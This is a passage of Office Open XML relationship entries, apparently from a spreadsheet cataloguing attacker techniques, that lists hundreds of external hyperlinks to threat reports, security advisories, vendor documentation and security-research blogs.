Id="rId1768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown" TargetMode="External"/><Relationship Id="rId2514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490864.aspx" TargetMode="External"/><Relationship Id="rId2721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA17-164A" TargetMode="External"/><Relationship Id="rId2819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/dotnet/visual-basic/" TargetMode="External"/><Relationship Id="rId900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html" TargetMode="External"/><Relationship Id="rId1323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html" TargetMode="External"/><Relationship Id="rId1530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/" TargetMode="External"/><Relationship Id="rId1628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/fileio/file-management" TargetMode="External"/><Relationship Id="rId1975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" TargetMode="External"/><Relationship Id="rId1835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490994.aspx" TargetMode="External"/><Relationship Id="rId3050" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn" TargetMode="External"/><Relationship Id="rId1902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection" TargetMode="External"/><Relationship Id="rId2097" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.radware.com/security/2018/07/micropsia-malware/" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware" TargetMode="External"/><Relationship Id="rId690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" TargetMode="External"/><Relationship Id="rId2164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa22-074a" TargetMode="External"/><Relationship Id="rId2371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis" TargetMode="External"/><Relationship Id="rId3008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kjaer.io/extension-malware/" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/" TargetMode="External"/><Relationship Id="rId788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/" TargetMode="External"/><Relationship Id="rId995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Kevin-Robertson/Inveigh" TargetMode="External"/><Relationship Id="rId1180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" TargetMode="External"/><Relationship Id="rId2024" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ss64.com/osx/system_profiler.html" TargetMode="External"/><Relationship Id="rId2231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/darkhotels-attacks-in-2015/71713/" TargetMode="External"/><Relationship Id="rId2469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md" TargetMode="External"/><Relationship Id="rId2676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets" TargetMode="External"/><Relationship Id="rId2883" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Visual_Basic_for_Applications" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/" TargetMode="External"/><Relationship Id="rId648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03" TargetMode="External"/><Relationship Id="rId855" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" TargetMode="External"/><Relationship Id="rId1040" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dxa4481/truffleHog" TargetMode="External"/><Relationship Id="rId1278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kubernetes.io/docs/reference/kubectl/kubectl/" TargetMode="External"/><Relationship Id="rId1485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/" TargetMode="External"/><Relationship Id="rId1692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/" TargetMode="External"/><Relationship Id="rId2329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://silentbreaksecurity.com/malicious-outlook-rules/" TargetMode="External"/><Relationship Id="rId2536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc940106.aspx" TargetMode="External"/><Relationship Id="rId2743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability" TargetMode="External"/><Relationship Id="rId715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" TargetMode="External"/><Relationship Id="rId922" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" TargetMode="External"/><Relationship Id="rId1138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.icann.org/groups/ssac/documents/sac-007-en" TargetMode="External"/><Relationship Id="rId1345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://logrhythm.com/blog/do-you-trust-your-computer/" TargetMode="External"/><Relationship Id="rId1552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/ms537359.aspx" TargetMode="External"/><Relationship Id="rId1997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/" TargetMode="External"/><Relationship Id="rId2603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi" TargetMode="External"/><Relationship Id="rId2950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol" TargetMode="External"/><Relationship Id="rId1205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" TargetMode="External"/><Relationship Id="rId1857" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/" TargetMode="External"/><Relationship Id="rId2810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf" TargetMode="External"/><Relationship Id="rId2908" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html" TargetMode="External"/><Relationship Id="rId1412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://malwareunicorn.org/workshops/macos_dylib_injection.html" TargetMode="External"/><Relationship Id="rId1717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections" TargetMode="External"/><Relationship Id="rId1924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain" TargetMode="External"/><Relationship Id="rId3072" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/blog/malware-lingers-with-bits" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" TargetMode="External"/><Relationship Id="rId2186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx" TargetMode="External"/><Relationship Id="rId2393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" TargetMode="External"/><Relationship Id="rId2698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/leoloobeek/status/939248813465853953" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" TargetMode="External"/><Relationship Id="rId2046" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" TargetMode="External"/><Relationship Id="rId2253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/shedding-skin-turlas-fresh-faces/88069/" TargetMode="External"/><Relationship Id="rId2460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://airbus-cyber-security.com/the-eye-of-the-tiger/" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf" TargetMode="External"/><Relationship Id="rId877" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html" TargetMode="External"/><Relationship Id="rId1062" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in" TargetMode="External"/><Relationship Id="rId2113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.recordedfuture.com/chinese-mss-behind-apt3/" TargetMode="External"/><Relationship Id="rId2320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/" TargetMode="External"/><Relationship Id="rId2558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/library/cc770880.aspx" TargetMode="External"/><Relationship Id="rId2765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" TargetMode="External"/><Relationship Id="rId2972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Diantz/" TargetMode="External"/><Relationship Id="rId737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/" TargetMode="External"/><Relationship Id="rId944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fortune.com/2017/09/06/hack-energy-grid-symantec/" TargetMode="External"/><Relationship Id="rId1367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx" TargetMode="External"/><Relationship Id="rId1574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154" TargetMode="External"/><Relationship Id="rId1781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/" TargetMode="External"/><Relationship Id="rId2418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/how-trojanhydraq-stays-your-computer" TargetMode="External"/><Relationship Id="rId2625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/" TargetMode="External"/><Relationship Id="rId2832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1729" TargetMode="External"/><Relationship Id="rId804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html" TargetMode="External"/><Relationship Id="rId1227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/malicious-tasks-in-ms-sql-server/92167/" TargetMode="External"/><Relationship Id="rId1434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.man7.org/linux/man-pages/man8/ld.so.8.html" TargetMode="External"/><Relationship Id="rId1641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/dd207691.aspx" TargetMode="External"/><Relationship Id="rId1879" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF" TargetMode="External"/><Relationship Id="rId3094" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/" TargetMode="External"/><Relationship Id="rId1501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767" TargetMode="External"/><Relationship Id="rId1739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr" TargetMode="External"/><Relationship Id="rId1946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/" TargetMode="External"/><Relationship Id="rId1806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.clearskysec.com/copykitten-jpost/" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/" TargetMode="External"/><Relationship Id="rId2068" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times" TargetMode="External"/><Relationship Id="rId2275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secureworks.com/research/threat-profiles/iron-hemlock" TargetMode="External"/><Relationship Id="rId3021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.magnusviri.com/Mac/what-is-emond.html" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/" TargetMode="External"/><Relationship Id="rId899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" TargetMode="External"/><Relationship Id="rId1084" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/vpc/docs/vpc" TargetMode="External"/><Relationship Id="rId2482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" TargetMode="External"/><Relationship Id="rId2787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/who-is-pioneer-kitten/" TargetMode="External"/><Relationship Id="rId661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" TargetMode="External"/><Relationship Id="rId759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.entrust.net/knowledge-base/technote.cfm?tn=8165" TargetMode="External"/><Relationship Id="rId966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gmer.net/" TargetMode="External"/><Relationship Id="rId1291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/" TargetMode="External"/><Relationship Id="rId1389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/" TargetMode="External"/><Relationship Id="rId1596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc759136(v=ws.10).aspx" TargetMode="External"/><Relationship Id="rId2135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html" TargetMode="External"/><Relationship Id="rId2342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://news.sophos.com/en-us/2019/03/05/emotet-101-stage-4-command-and-control/" TargetMode="External"/><Relationship Id="rId2647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/" TargetMode="External"/><Relationship Id="rId2994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware" TargetMode="External"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/page/file/1122671/download" TargetMode="External"/><Relationship Id="rId1151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" TargetMode="External"/><Relationship Id="rId1249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044" TargetMode="External"/><Relationship Id="rId2202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/PyroTek3/status/1126487227712921600/photo/1" TargetMode="External"/><Relationship Id="rId2854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/" TargetMode="External"/><Relationship Id="rId826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east" TargetMode="External"/><Relationship Id="rId1011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/peewpw/Invoke-PSImage" TargetMode="External"/><Relationship Id="rId1109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944" TargetMode="External"/><Relationship Id="rId1456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation" TargetMode="External"/><Relationship Id="rId1663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/" TargetMode="External"/><Relationship Id="rId1870" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://digital.nhs.uk/cyber-alerts/2020/cc-3681" TargetMode="External"/><Relationship Id="rId1968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/encyclopedia/term/double-extension" TargetMode="External"/><Relationship Id="rId2507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html" TargetMode="External"/><Relationship Id="rId2714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/alerts/TA15-314A" TargetMode="External"/><Relationship Id="rId2921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/" TargetMode="External"/><Relationship Id="rId1316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html" TargetMode="External"/><Relationship Id="rId1523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657" TargetMode="External"/><Relationship Id="rId1730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/sysinternals/downloads/reghide" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?p=1729" TargetMode="External"/><Relationship Id="rId1828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules" TargetMode="External"/><Relationship Id="rId3043" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" TargetMode="External"/><Relationship Id="rId2297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securitytrails.com/blog/google-hacking-techniques" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/alerts/aa20-296a" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/two-birds-one-stone-panda/" TargetMode="External"/><Relationship Id="rId683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" TargetMode="External"/><Relationship Id="rId890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf" TargetMode="External"/><Relationship Id="rId2157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 